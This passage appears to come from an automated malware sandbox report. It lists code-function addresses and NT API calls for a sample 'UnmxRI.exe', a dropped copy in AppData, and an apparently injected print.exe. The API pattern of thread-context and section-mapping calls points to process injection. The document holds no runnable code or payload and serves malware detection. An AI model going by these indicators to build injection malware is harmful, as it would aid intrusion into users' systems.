                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040A103 NtGetContextThread,9_2_0040A103
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040AB63 NtMapViewOfSection,9_2_0040AB63
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040A313 NtSetContextThread,9_2_0040A313
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040B433 NtDelayExecution,9_2_0040B433
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040A523 NtResumeThread,9_2_0040A523
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040AD93 NtCreateFile,9_2_0040AD93
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00428603 NtClose,9_2_00428603
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00409EF3 NtSuspendThread,9_2_00409EF3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040AFC3 NtReadFile,9_2_0040AFC3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2B60 NtClose,LdrInitializeThunk,9_2_018E2B60
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_018E2DF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_018E2C70
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E35C0 NtCreateMutant,LdrInitializeThunk,9_2_018E35C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E4340 NtSetContextThread,9_2_018E4340
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E4650 NtSuspendThread,9_2_018E4650
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2B80 NtQueryInformationFile,9_2_018E2B80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2BA0 NtEnumerateValueKey,9_2_018E2BA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2BE0 NtQueryValueKey,9_2_018E2BE0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2BF0 NtAllocateVirtualMemory,9_2_018E2BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2AB0 NtWaitForSingleObject,9_2_018E2AB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2AD0 NtReadFile,9_2_018E2AD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2AF0 NtWriteFile,9_2_018E2AF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2DB0 NtEnumerateKey,9_2_018E2DB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2DD0 NtDelayExecution,9_2_018E2DD0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2D00 NtSetInformationFile,9_2_018E2D00
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2D10 NtMapViewOfSection,9_2_018E2D10
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2D30 NtUnmapViewOfSection,9_2_018E2D30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2CA0 NtQueryInformationToken,9_2_018E2CA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2CC0 NtQueryVirtualMemory,9_2_018E2CC0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2CF0 NtOpenProcess,9_2_018E2CF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2C00 NtQueryInformationProcess,9_2_018E2C00
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2C60 NtCreateKey,9_2_018E2C60
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2F90 NtProtectVirtualMemory,9_2_018E2F90
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2FA0 NtQuerySection,9_2_018E2FA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2FB0 NtResumeThread,9_2_018E2FB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2FE0 NtCreateFile,9_2_018E2FE0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2F30 NtCreateSection,9_2_018E2F30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2F60 NtCreateProcessEx,9_2_018E2F60
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2E80 NtReadVirtualMemory,9_2_018E2E80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2EA0 NtAdjustPrivilegesToken,9_2_018E2EA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2EE0 NtQueueApcThread,9_2_018E2EE0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E2E30 NtWriteVirtualMemory,9_2_018E2E30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3090 NtSetValueKey,9_2_018E3090
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3010 NtOpenDirectoryObject,9_2_018E3010
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E39B0 NtGetContextThread,9_2_018E39B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3D10 NtOpenProcessToken,9_2_018E3D10
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E3D70 NtOpenThread,9_2_018E3D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E74340 NtSetContextThread,LdrInitializeThunk,16_2_02E74340
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E74650 NtSuspendThread,LdrInitializeThunk,16_2_02E74650
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AF0 NtWriteFile,LdrInitializeThunk,16_2_02E72AF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AD0 NtReadFile,LdrInitializeThunk,16_2_02E72AD0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BE0 NtQueryValueKey,LdrInitializeThunk,16_2_02E72BE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_02E72BF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BA0 NtEnumerateValueKey,LdrInitializeThunk,16_2_02E72BA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72B60 NtClose,LdrInitializeThunk,16_2_02E72B60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72EE0 NtQueueApcThread,LdrInitializeThunk,16_2_02E72EE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72E80 NtReadVirtualMemory,LdrInitializeThunk,16_2_02E72E80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FE0 NtCreateFile,LdrInitializeThunk,16_2_02E72FE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FB0 NtResumeThread,LdrInitializeThunk,16_2_02E72FB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F30 NtCreateSection,LdrInitializeThunk,16_2_02E72F30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_02E72CA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C60 NtCreateKey,LdrInitializeThunk,16_2_02E72C60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02E72C70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_02E72DF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DD0 NtDelayExecution,LdrInitializeThunk,16_2_02E72DD0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_02E72D30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D10 NtMapViewOfSection,LdrInitializeThunk,16_2_02E72D10
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E735C0 NtCreateMutant,LdrInitializeThunk,16_2_02E735C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E739B0 NtGetContextThread,LdrInitializeThunk,16_2_02E739B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AB0 NtWaitForSingleObject,16_2_02E72AB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72B80 NtQueryInformationFile,16_2_02E72B80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72EA0 NtAdjustPrivilegesToken,16_2_02E72EA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72E30 NtWriteVirtualMemory,16_2_02E72E30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FA0 NtQuerySection,16_2_02E72FA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F90 NtProtectVirtualMemory,16_2_02E72F90
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F60 NtCreateProcessEx,16_2_02E72F60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CF0 NtOpenProcess,16_2_02E72CF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CC0 NtQueryVirtualMemory,16_2_02E72CC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C00 NtQueryInformationProcess,16_2_02E72C00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DB0 NtEnumerateKey,16_2_02E72DB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D00 NtSetInformationFile,16_2_02E72D00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73090 NtSetValueKey,16_2_02E73090
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73010 NtOpenDirectoryObject,16_2_02E73010
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73D70 NtOpenThread,16_2_02E73D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73D10 NtOpenProcessToken,16_2_02E73D10
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4D70 NtCreateFile,16_2_004C4D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4EA0 NtReadFile,16_2_004C4EA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4F60 NtDeleteFile,16_2_004C4F60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4FE0 NtClose,16_2_004C4FE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C5110 NtAllocateVirtualMemory,16_2_004C5110
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_0236D55C0_2_0236D55C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A678600_2_06A67860
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A6B7A00_2_06A6B7A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A675B80_2_06A675B8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A6B5E00_2_06A6B5E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A675C80_2_06A675C8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A6001B0_2_06A6001B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A600400_2_06A60040
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A6A8400_2_06A6A840
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A678520_2_06A67852
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_0A6C0D200_2_0A6C0D20
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004019BA9_2_004019BA
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004030069_2_00403006
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004028D09_2_004028D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004100E39_2_004100E3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0042A9439_2_0042A943
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040294C9_2_0040294C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004011609_2_00401160
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004103039_2_00410303
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004033059_2_00403305
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004033109_2_00403310
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040E3839_2_0040E383
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00402BB09_2_00402BB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004165D09_2_004165D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004165D39_2_004165D3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00401E209_2_00401E20
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004026C89_2_004026C8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004026D09_2_004026D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00402FAE9_2_00402FAE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00402FB09_2_00402FB0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019641A29_2_019641A2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019701AA9_2_019701AA
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019681CC9_2_019681CC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A01009_2_018A0100
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194A1189_2_0194A118
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019381589_2_01938158
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019420009_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019703E69_2_019703E6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE3F09_2_018BE3F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A3529_2_0196A352
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019302C09_2_019302C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019502749_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019705919_2_01970591
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B05359_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195E4F69_2_0195E4F6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019544209_2_01954420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019624469_2_01962446
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AC7C09_2_018AC7C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D47509_2_018D4750
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B07709_2_018B0770
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CC6E09_2_018CC6E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B29A09_2_018B29A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0197A9A69_2_0197A9A6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C69629_2_018C6962
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018968B89_2_018968B8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE8F09_2_018DE8F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BA8409_2_018BA840
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B28409_2_018B2840
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01966BD79_2_01966BD7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196AB409_2_0196AB40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AEA809_2_018AEA80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C8DBF9_2_018C8DBF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AADE09_2_018AADE0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BAD009_2_018BAD00
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194CD1F9_2_0194CD1F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950CB59_2_01950CB5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A0CF29_2_018A0CF2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0C009_2_018B0C00
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192EFA09_2_0192EFA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A2FC89_2_018A2FC8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BCFE09_2_018BCFE0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01952F309_2_01952F30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F2F289_2_018F2F28
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D0F309_2_018D0F30
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01924F409_2_01924F40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196CE939_2_0196CE93
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C2E909_2_018C2E90
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196EEDB9_2_0196EEDB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196EE269_2_0196EE26
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0E599_2_018B0E59
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BB1B09_2_018BB1B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E516C9_2_018E516C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189F1729_2_0189F172
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0197B16B9_2_0197B16B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B70C09_2_018B70C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195F0CC9_2_0195F0CC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196F0E09_2_0196F0E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019670E99_2_019670E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F739A9_2_018F739A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196132D9_2_0196132D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189D34C9_2_0189D34C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B52A09_2_018B52A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CB2C09_2_018CB2C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019512ED9_2_019512ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194D5B09_2_0194D5B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019795C39_2_019795C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019675719_2_01967571
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196F43F9_2_0196F43F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A14609_2_018A1460
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196F7B09_2_0196F7B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019616CC9_2_019616CC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F56309_2_018F5630
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019459109_2_01945910
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B99509_2_018B9950
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CB9509_2_018CB950
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B38E09_2_018B38E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191D8009_2_0191D800
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CFB809_2_018CFB80
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01925BF09_2_01925BF0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018EDBF99_2_018EDBF9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196FB769_2_0196FB76
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018F5AA09_2_018F5AA0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01951AA39_2_01951AA3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194DAAC9_2_0194DAAC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195DAC69_2_0195DAC6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01967A469_2_01967A46
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196FA499_2_0196FA49
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01923A6C9_2_01923A6C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CFDC09_2_018CFDC0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B3D409_2_018B3D40
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01961D5A9_2_01961D5A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01967D739_2_01967D73
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196FCF29_2_0196FCF2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01929C329_2_01929C32
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B1F929_2_018B1F92
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196FFB19_2_0196FFB1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01873FD59_2_01873FD5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01873FD29_2_01873FD2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196FF099_2_0196FF09
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B9EB09_2_018B9EB0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_00B9D55C10_2_00B9D55C
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD786010_2_06AD7860
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06ADB7A010_2_06ADB7A0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06ADB5E010_2_06ADB5E0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD75C810_2_06AD75C8
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD000610_2_06AD0006
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD004010_2_06AD0040
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06ADA84010_2_06ADA840
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_08F9044010_2_08F90440
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0115010014_2_01150100
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011A600014_2_011A6000
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011E02C014_2_011E02C0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116053514_2_01160535
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0118475014_2_01184750
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116077014_2_01160770
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0115C7C014_2_0115C7C0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117C6E014_2_0117C6E0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117696214_2_01176962
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011629A014_2_011629A0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116284014_2_01162840
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116A84014_2_0116A840
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0119889014_2_01198890
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011468B814_2_011468B8
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0118E8F014_2_0118E8F0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0115EA8014_2_0115EA80
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116AD0014_2_0116AD00
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116ED7A14_2_0116ED7A
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01178DBF14_2_01178DBF
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01168DC014_2_01168DC0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0115ADE014_2_0115ADE0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01160C0014_2_01160C00
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01150CF214_2_01150CF2
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01180F3014_2_01180F30
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011A2F2814_2_011A2F28
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011D4F4014_2_011D4F40
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011DEFA014_2_011DEFA0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01152FC814_2_01152FC8
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01160E5914_2_01160E59
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01172E9014_2_01172E90
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0114F17214_2_0114F172
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0119516C14_2_0119516C
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116B1B014_2_0116B1B0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0114D34C14_2_0114D34C
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011633F314_2_011633F3
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011652A014_2_011652A0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117B2C014_2_0117B2C0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117D2F014_2_0117D2F0
